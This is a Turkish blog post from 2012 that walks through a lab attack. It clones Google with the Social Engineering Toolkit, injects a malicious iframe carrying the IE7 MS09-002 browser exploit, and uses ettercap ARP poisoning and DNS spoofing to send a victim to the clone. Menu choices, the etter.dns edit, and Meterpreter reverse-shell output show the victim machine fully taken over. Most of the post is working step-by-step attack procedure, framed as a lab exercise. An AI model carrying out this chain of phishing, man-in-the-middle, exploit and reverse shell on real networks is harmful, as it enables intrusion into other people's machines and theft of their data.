5 Temmuz 2012 Perşembe

Sosyal Mühendislik + DNS spoofing Uygulaması






Amaç:
Sosyal Mühendislik ve DNS spoofing saldırısının bütünleşik olarak uygulanması.

Senaryo:
Kurban makinesi ile aynı ağda bulunan Saldırgan üzerinde Sosyal Mühendislik Aracı ile www.google.com sitesi klonlanacaktır. Klonlama işlemi tamamlandıktan sonra ettercap aracı ile DNS spoofing yapılarak ağ üzerindeki tüm DNS sorguları saldırgan makinesine yönlendirilecektir. Spoof edilmiş DNS üzerinde www.google.com adresini klonladığımız yeni adrese yönlendirerek kurban makinesi ele geçirilmiş olacaktır.

Öncelikle kısaca kullanacağımız iki araçtan bahsedelim. Birincisi Social Engineering Toolkit (SET). SET, çeşitli sosyal mühendislik saldırıları için hazırlanmış bir araç olarak karşımıza çıkıyor. Oltalama (Phishing) saldırıları, websitesi klonlama gibi yetenekleri mevcut. Ayrıntılı bilgiye buradan ulaşabilirsiniz. İkinci olarak kullanacağımız araç ise ettercap. Bu araç DNS ve ARP spoofing için biçilmiş kaftan. Kullanım detaylarını aşağıda ayrıntılarıyla göreceğiz. Ama yinede detaylı bilgi istiyorsanız şöyle buyurun.

Şimdi SET ile websitesi klonlama işlemine başlayalım.
pentest/exploits/set dizini altında SET’i çalıştırıyoruz.

root@bt:/pentest/exploits/set# ./set

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

Gelen seçeneklerden Social-Engineering (1)’i seçiyoruz.
set> 1
 ---------------------

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

Website Attack (2)’yi seçerek devam ediyoruz.
set> 2
---------------------
 
   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Victim Web Profiler
   9) Create or import a CodeSigning Certificate

  99) Return to Main Menu

(2) seçeneğinde bulunan Metasploit’i seçerek devam ediyoruz. Burada metasploit modülünü kullanacağımızı belirtiyoruz.
set:webattack>2
 --------------------- 

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

Web Templates seçiyoruz. www.google.com sitesinin klonunu alacağımız için template olarak hazırda bulunduğu için bunu kullanıyoruz. Site cloner seçeneği ile herhangi bir websitesinin klonunu alabiliriz.
set:webattack>1
---------------------
Klonladığımız sitenin hangi adrese yönleneceğini belirtiyoruz.

set:webattack> Your interface IP Address:192.168.1.128
 ---------------------

  1. Java Required 
  2. Gmail
  3. Google
  4. Facebook
  5. Twitter

Klonlayacağımız site Google olduğu için seçip devam ediyoruz.
set:webattack> Select a template:3
---------------------

Karşımıza  kullanabileceğimiz exploitlerden çıkan bir liste çıkıyor. 25’i seçerek devam ediyoruz. Eğer karşıdaki sistem hakkında bilgimiz yoksa 32 seçeneğini seçmek faydalı olacaktır.

 Enter the browser exploit you would like to use [8]:

  19)..
  20) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution
  21) Microsoft Help Center XSS and Command Execution (MS10-042)
  22) Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
  23) Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
  24) Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
  25) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
  26) Microsoft Internet Explorer Style getElementsbyTagName Corruption (MS09-072)
  27) ..
  32) ..

set:payloads>25
---------------------

   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) …
Payload olarak Reverse_TCP Meterpreter kullanmak istiyoruz.
set:payloads>2
---------------------

Reverse bağlantının yapılacağı port numarasını giriyoruz.

set:payloads> Port to use for the reverse [443]:4444
 ---------------------

[*] Cloning the website: http://www.google.com
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.


***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[*] Server started.

“Server started” yazısı ile dinleme işleminin başladığını anlıyoruz. Kurbanın klonladığımız adresi tıklamasını dört gözle bekliyoruz.Tabi bunu sağlamak için de DNS spoofing yaparak www.google.com adresini yukarıda verdiğimiz 192.168.1.128 adresine yönlendirmemiz gerekiyor.

Şimdi ettercap aracı ile DNS spoofing işlemlerine adım adım başlayalım.
Komut satırından ettercap –G yazarak çalıştırıyoruz. G ile arayüz açılmasını sağlamış oluyoruz.

root@bt: ettercap –G

Aşağıdaki gibi bir ara yüz açılıyor. Burada Sniff sekmesi altında Unified Sniffing’i seçerek işlemi başlatıyoruz.



Network interface’imizi seçerek devam ediyoruz.



Ağımızda bulunan makineleri bulmak için Hosts altında Scan for hosts seçeneğini tıklıyoruz. İşlem tamamlandıktan sonra yine aynı yerden Hosts List’i seçerek bulunan makineleri listeliyoruz.



DNS spoofing yapmak istediğimiz makineleri seçerek Add to Target 1 ve Add to Target 2 diyerek ekliyoruz. Burada listelenen makineler içinde 192.168.1.1 DNS sunucusu. 192.168.1.129 ise ele geçirmek istediğimiz kurban makinesi.



Saldırı yapacağımız makineleri ekledikten sonra Mitm seçeneği altında ARP Poisoning’i seçiyoruz. Peki burada neden ARP poisoning seçme ihtiyacı hissediyoruz. DNS spoofing yaparken kurban makinesi üzerinde DNS makinesinin ARP kayıtlarını saldırgan makinesinin MAC adresi ile değiştirmemiz gerekiyor  Böylece DNS sorgusu yapmak isteyen kurban saldırgan üzerinden geçecektir.



Açılan pencerede sniff remote connections seçeneğini seçerek devam ediyoruz.



Daha sonra Start sekmesi altında Start sniffing’i seçerek ARP poisoning işlemini başlatıyoruz.



ARP poisoning işleminin başladığını test edelim. Öncelikle bir üst ekran çıktısında da görüldüğü gibi 192.168.1.1 IP’li DNS sunucusunun MAC adresi 00:50:56:C0:00:02 şeklinde. Aşağıdaki şekilde görüldüğü gibi Kurban makinesi üzerinde DNS sunucusunun MAC adresi 00:0C:29:58:AC:4A olarak değişti. Peki bu MAC adresi kime 
ait?




Yukarıda Kurban makinesinin ARP kayıtlarında bulunan MAC adresi saldırgan makinesine ait. Aşağıdaki şekilde  eth1 karşısında görülmektedir.





Kurban makinesi DNS sunucusu olarak saldırgan’ı gördüğüne göre DNS spoofing işlemlerine başlayabiliriz. Öncelikle saldırgan makinesi üzerine gelen DNS sorgularının SET ile tanımladığımız 192.168.1.1 adresine yönlendirilmesi gerekiyor. Bunu yapabilmek için etter.dns konfigürasyon dosyasını vi editör ile açıyoruz. Burada istenilen editör kullanılabilir. Daha sonra şekildeki gibi www.google.com adresini 192.168.1.128 olarak ekliyoruz, kaydedip çıkıyoruz.





DNS spoofing’i aktif hale getirmek için Plugins sekmesi altında Manage the plugins seçeneğini seçiyoruz.



Karşımıza gelen pluginler altında dns_spoof’u seçiyoruz.



Şimdi kurbanın www.google.com adresine gitmesini bekliyoruz. Baktık gitmiyor biz gidip giriyoruz J



Şekilde görüldüğü gibi klonladığımız Google sayfası açıldı. Bunu iki şekilde anlıyoruz. Birincisi Lab ortamımızın internet erişimi olmadığı için bu sayfanın normal şartlarda gelmemesi lazım. İkincisi ise aşağıda ettercap üzerinde görülen google.com spoofed to 192.168.1.128 mesajı.





Kurbanı spoof edilmiş DNS üzerinden 192.168.1.128 adresine yönlendirdiğimize göre şimdi sıra geldi SET’e bakmaya. Meterpreter session 1 opened mesajı bize başarılı bir şekilde kurban makinesini ele geçirdiğimizi gösteriyor.



[*] Sending stage (752128 bytes) to 192.168.1.129

[*] Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption to 192.168.1.129:1032...

[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.129:1035) at 2012-07-03 10:50:26 -0400

[*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.129:1035) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3520)

[*] Spawning notepad.exe process to migrate to


[+] Migrating to 2468

[+] Successfully migrated to process 

Interrupt: use the 'exit' command to quit

msf  exploit(ms09_002_memory_corruption) > sessions 



Active sessions


===============



  Id  Type                   Information                                      Connection


  --  ----                   -----------                                      ----------

  1   meterpreter x86/win32  \Administrator @ 192.168.1.128:4444 -> 192.168.1.129:1035 (192.168.1.129)


Açılan meterpreter oturumunu çağırıyoruz.

msf  exploit(ms09_002_memory_corruption) > sessions -i 1

[*] Starting interaction with 1...



Kurban makinesinde olduğumuzun doğruluğunu test ediyoruz.

meterpreter > shell 

Process 3476 created.


Channel 1 created.

Microsoft Windows [Version 5.2.3790]

(C) Copyright 1985-2003 Microsoft Corp.



C:\Documents and Settings\Administrator\Desktop>ipconfig



Windows IP Configuration



Ethernet adapter Local Area Connection:



   Connection-specific DNS Suffix  . : localdomain


   IP Address. . . . . . . . . . . . : 192.168.1.129

   Subnet Mask . . . . . . . . . . . : 255.255.255.0

   Default Gateway . . . . . . . . . : 



C:\Documents and Settings\Administrator\Desktop>


Artık güç bizde..




-GG

















0 yorum:

Yorum Gönder